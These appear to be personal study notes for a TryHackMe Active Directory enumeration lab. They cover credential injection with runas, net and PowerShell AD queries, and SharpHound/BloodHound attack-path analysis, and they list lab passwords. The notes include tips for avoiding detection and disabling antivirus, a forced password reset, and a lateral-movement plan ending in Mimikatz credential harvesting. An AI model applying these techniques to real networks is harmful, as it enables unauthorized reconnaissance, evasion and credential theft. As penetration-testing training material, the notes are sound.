###### `Active Directory` `Enumerate`
[TOC]
**Enumerate Active Directory**
Once we obtained AD credentials, we will leverage AD credentials to enumerate the AD configuration and structure.
Finding out Other attack paths to new privilege position.
# Network Setting
## Connecting to the VPN
```shell=
#!/bin/bash
echo "kali" | sudo -S -v
if [ $? -eq 0 ]; then
sudo openvpn ./adenumeration.ovpn
sudo -s
else
echo "Sudo驗證失敗,無法運行OpenVPN。"
fi
```
## DNS Configuration
### Linux Machine
DNS Server: 10.200.18.101
```shell=
sudo systemctl restart NetworkManager
```
### Windows Machine
```
PS C:\Windows\system32> $dnsip ="10.200.18.101"
PS C:\Windows\system32> $index = Get-NetAdapter -Name '區域連線' | Select-Object -ExpandProperty 'ifIndex'
PS C:\Windows\system32> Set-DnsClientServerAddress -InterfaceIndex $index -ServerAddresses $dnsip
```
---
<!--
```
Username: graeme.williams
Password: hJnlKuLBa2
```
SSH Connection as AD identity
```
ssh za.tryhackme.com\\rachel.dunn@thmjmp1.za.tryhackme.com
```
password: Bmlj9838
 -->
<!-- ## Inject AD credential into Memory
### Connecting to the host(Not Domain Machine)
```
nslookup THMJMP1.za.tryhackme.com
```
```
xfreerdp /u:"thm" /p:"Password1@" /v:10.200.58.248 /dynamic-resolution
```
---
### Injected AD Credential to CMD
```
runas.exe /netonly /user:za.tryhackme.com\rachel.dunn cmd.exe
```
password :Bmlj9838 -->
# Credential Injection
We typically could obtain the AD initial Credential without compromise domain computers, thus we need to inject Ad credential in our machine pretend we are a valid domain computers.
## Runas.exe
We can leverage a Windows in-build tools call 'Runas.exe'.
Runas.exe allow us to injected credentials into memory, granting us the ability to use those AD credential to access service
Run cmd.exe as Standard Local Account
```cmd
runas.exe /netonly /user:<domain>\<user> cmd.exe
```
/netonly: Injects credentials only use in network servers for authentication.(Run as Standard Local Account ) allowing escape from the DC authentication.
/user: Use the Fully Qualified Domain Name (FQDN) instead of the NetBIOS name.
## LAB - runas.exe
### Connecting to the host(Not Domain Machine)
RDP
```
xfreerdp /u:"thm" /p:"Password1@" /v:10.200.18.248 /dynamic-resolution
```
### AD credential Injection
```
runas.exe /netonly /user:za.tryhackme.com\rachel.dunn cmd.exe
```
password Bmlj9838
### Check
```
dir \\Domain\SYSVOL
```
Notice: Since credentials are not authenticated by the domain controller, ensuring the password is correct is crucial.
## IP(NTLM) Vs Domain Name(Kerberos)
```
dir \\DC domain name\SYSVOL -> Using Kerbers Auth
dir \\DC IP\SYSVOL -> Using NTLN Auth(Better)
```
Supplying a domain name for querying the SYSVOL folder DC will use Kerberos auth.
Providing an IP forces NTLM authentication, a useful trick during Red Team engagements, forcing NTLM authentication will helps us to avoid detection.
# Microsoft Management Console (mmc)
SSH Credential
```
account:thm
password:Password1@
```
```
xfreerdp /u:"thm" /p:"Password1@" /v:10.200.18.248 /dynamic-resolution
```
```
mmc
```
## Microsoft Management Console(MMC) and RSAT
MMC is a tool used to host administrator tools known as snap-ins.
RSAT: Remote Server Administrator Tools
To attach an RSAT snap-in with MMC:
### Open MMC
In the MMC console, go to **File > Add/Remove Snap-in**.
### Adding RSAT component
### Point the RSAT snap in our domain controller
Manage the associated serviced and configuration.
```
Domain: za.tryhackme.com
```
If every thing is set up correctly, our MMC should be point to and authenticated against `za.tryhackme.com`
Now, we could start to enumerate the AD structure
## Enumeration
### User and Computer structure
### People OUs
**IT Department**
IF we have the necessary privileges, we can directly modify the AD
**Serves**
**Workstation**
**Admin**
---
# Command Prompt (net)
Command Prompt allow us to quick and dirty enumerate AD structure
## Users
### ALL AD User
```
net user /domain
```
### Single User
```
net user AD_USER /domain
```
Notice:
Usually, after more than ten group memberships, the command will fail to list them all.
## Group
### ALL Grops
Enumerate the Group information
```
net group /domain
```
we can also specify a particular group, to obtain more information .
### Single Groups
```
net group "Tier 0 Admins" /domain
```
## Account Policy
Enumerate the password policy
```
net accounts /domain
```
---
LABs
---
# Powershell
Powershell provide extra cmdlet(commend lets) which are .NET class to perform some special tasks
When we use the AD-RAST tooling, it will automatically import the AD modules(50+ cmdlets installed)
https://learn.microsoft.com/en-us/powershell/module/activedirectory/?view=windowsserver2022-ps
Import Modules
```
import-module ActiveDirectory
```
## Users
### All users
```powershell=
Get-ADUser -Filter 'Name -like "*"' -Server za.tryhackme.com | Format-Table Name,SamAccountName -A
```
Filter options support more advance to search specific account
Format table make output more readable.
### Specify user
```
Get-ADUser -Identity gordon.stevens -Server za.tryhackme.com -Properties *
```
## Groups
### Groups Information
```
Get-ADGroup -Identity 'Tier 2 Admins' -Server za.tryhackme.com -Properties *
```
```
Get-ADGroup -Filter 'Name -like "*"' -Server za.tryhackme.com | Format-Table Name -A
```
### Show Group Members
```
Get-ADGroupMember -Identity Administrators -Server za.tryhackme.com
```
## AD object
### Search certain condition object
```
$ChangeDate = New-Object DateTime(2022, 02, 28, 12, 00, 00)
Get-ADObject -Filter 'whenChanged -gt $ChangeDate' -includeDeletedObjects -Server za.tryhackme.com
```
Look up badPwdCount property
```
Get-ADObject -Filter 'badPwdCount -gt 0' -Server za.tryhackme.com
```
Avoiding perform password spraying attack to testing those account
```
Get-ADObject -Filter 'badPwdCount -gt 0' -Server za.tryhackme.com
```
Those account we can arbitrary testing
## Domain
```
Get-ADDomain -Server za.tryhackme.com
```
## Modify AD Object
this is AD exploitation
we could use `Set-ADAccountPassword` to modify the user password forcefully.
```
Set-ADAccountPassword -Identity gordon.stevens -Server za.tryhackme.com -OldPassword (ConvertTo-SecureString -AsPlaintext "old" -force) -NewPassword (ConvertTo-SecureString -AsPlainText "new" -Force)
```
---
CM=Common-Name
,OU=Marketing,OU=People,DC=za,DC=tryhackme,DC=com
# BLoodhound (GUI)
BLoodhound allow us visualize the AD Environment in a graph
Graph-base thinking enable the attacker perform two-stage attack.
## Fist stages (自殺式枚舉)
Attacker perform initial attack to obtain AD credential for initial AD enumeration.
This stages is typically fast and noisy, and the attacker may trigger alerts
However, the information gathered during this stage is crucial for next stage, we obtain AD structure, it allow us planning attack path for next stages.
## Second stages(Quickly win)
Using the information perform second fishing engagement, we could reach our goal with minutes once a breach was achieved.
In some case, this is even faster than the blue team response time
## Sharphound
(Enumerate Tools)
Sharphound are used to enumerate the Active Directory
(Display Information and Search Attack Paths)
bloodhound utilized information to display AD attack paths on graph.
### Enumerate Script
https://github.com/BloodHoundAD/BloodHound/blob/master/Collectors
SharpHound provides various collectors to gather information
Sharphound.ps1 (Run in memory)
Sharphound.exe
ArureHound.ps1: (Azure Version)
**It's important to ensure that the version of sharphound and bloodhound have to match.**
### AV Escape
During engagements,using SharpHound or BloodHound may trigger alerts from antivirus (AV) systems, To overcome this:
1. **Disable AV:**
2. **Create Exceptions:**
3. **Non-Domain-Joined Machine:** Use a non-domain-joined machine to run the tools.
### Running Enumerate Script
```powershell==
Sharphound.exe --CollectionMethods <Methods> --Domain za.tryhackme.com --ExcludeDCs
```
Parameters Explained:
- `CollectionMethods`: Default or ALL (Command options).
- `Domain`: Specify the domain to enumerate.
- `ExcludeDCs`: Exclude the enumeration of AD controllers to reduce alert triggers.
Sharphound parameter document:
https://bloodhound.readthedocs.io/en/latest/data-collection/sharphound-all-flags.html
### Enumerate AD via sharphound
Credential Injection
Windows Users
```
\Users\denise.jenkins
```
Move SharpHound.exe to user\Document
```
copy \Tools\SharpHound.exe \Users\denise.jenkins\Documents
```
```
cd \Users\denise.jenkins\Documents
```
```
Sharphound.exe --CollectionMethods ALL --Domain za.tryhackme.com --ExcludeDCs
```
## BLoodhound
Reference:
https://bloodhound.readthedocs.io/_/downloads/en/latest/pdf/
Bloodhound requires Neo4j which is a graph database management systems
### Neo4j Database
Before starting BloodHound, Neo4j needs to be set up and start.
```
neo4j console
```
Change the password before logging in
Reference: https://neo4j.com/docs/operations-manual/current/kubernetes/operations/reset-password/
Server listen on
```
localhost:7687
```
### Connect to noe4j DB
Neo4j Browser pannel
Default Credentials:
Neo4j:Neo4j
Change Password
### Download the BloodHound GUI
https://github.com/BloodHoundAD/BloodHound/releases
```
lscpu
```
```
unzip BloodHound-linux-x64.zip
```
In this network we use BloodHound 4.10 version
```
chmod +x BloodHound
./BloodHound --no-sandbox
```
credentials
neo4j:neo4j01
### Open data in Bloodhound GUI
```
scp <file> kali@<attacker IP>:/tmp
```
or
```
scp <AD Username>@THMJMP1.za.tryhackme.com:C:/Users/<AD Username>/Documents/<Sharphound ZIP> <attacker floder>
```
Drag the ZIP file onto the BLoodhound GUI
### Database Information
Note:LeftCtrl can change the label display settings.
#### Search Specific Node
#### Database Information
Refresh DB info
### Node info
#### Overview
OUs Structure
Group membership
#### Node information
Shows information regarding the AD account
#### Extra Properties
#### Group Membership
First degree membership
#### Local admin Rights
It will show accounts has administrator privilege.
#### Execution Rights
#### Outbound Control Right
#### Inbound Control Right
-----------------------------------------------------------------
### Analysis Information
Analysis component and information to find out the attack paths.
#### Search ALL Domain Admin
In this graph, If we want to obtain the Domain Admin privilege, we have two attack surface.
One is T0-user, another is Administrator, since the Administrator is build-in local account, we will focus to get the access to the T0-user account.
### Exploitation
Each AD object can be considered as the Node
We can exploit those edges to lateral move
Edge filter (Lateral Movement)
#### Lateral Paths
Note: "No Results Found". Note, this may also be due to a Bloodhound/Sharphound mismatch,
We could do something like the following to exploit this path:
1. Use our AD credentials to RDP into **THMJMP1**.
2. Look for a privilege escalation vector on the host that would provide us with Administrative access.
3. Using Administrative access, we can use credential harvesting techniques and tools such as Mimikatz.
4. Since the T1 Admin has an active session on **THMJMP1**, our credential harvesting would provide us with the NTLM hash of the associated account.
More about exploit edge for lateral movement:[Bloodhound documentation](https://bloodhound.readthedocs.io/en/latest/data-analysis/edges.html)
### Session data Gathering
Session change -> user login or logout
Sessions are changeable, we need to gather session in constant interval, for example execute Sharphound at least twice a day using the "Session" collection method
Note:
Before we import the new session, we could clear previous session
## LAB-Enumerate through sharphound & bloodhound
---
---
# Conclusion
Enumerating AD structure is critical Before engaging lateral movement or privilege escalation
Through AD enumeration, we can discover single or multiple paths to achieve our goals.
## Other Enumerate techniques
### LDAP Enumeration
When the host or device need to authenticate their AD credential, their bind to the Domain Controller's LDAP interface.
Scripting can be use to search or test the LDAP service to enumerate the AD user account or other information.
Reference:https://book.hacktricks.xyz/network-services-pentesting/pentesting-ldap
### PowerView
- PowerView is an open-source project that provides PowerShell functions for enumerating and interacting with AD environments.
https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1
### WMI
**Enumerating Windows Management Infrastructure (WMI)**
Reference: https://0xinfection.github.io/posts/wmi-ad-enum/
WMI provides the `/root/directory/ldap` namespace to interact with AD authentication.
## AD Enumerate Migration
When SharpHound collects session information, it generates numerous login events. Detection rules or code can be implemented to identify these events.
Additionally, signature-based detection for specific tools like SharpHound or AD-RSAT can be developed.
Monitoring PowerShell usage
Blue Team can regularly view and analysis powershell log to Monitor PowerShell usage
Sign in with Wallet
Connect another wallet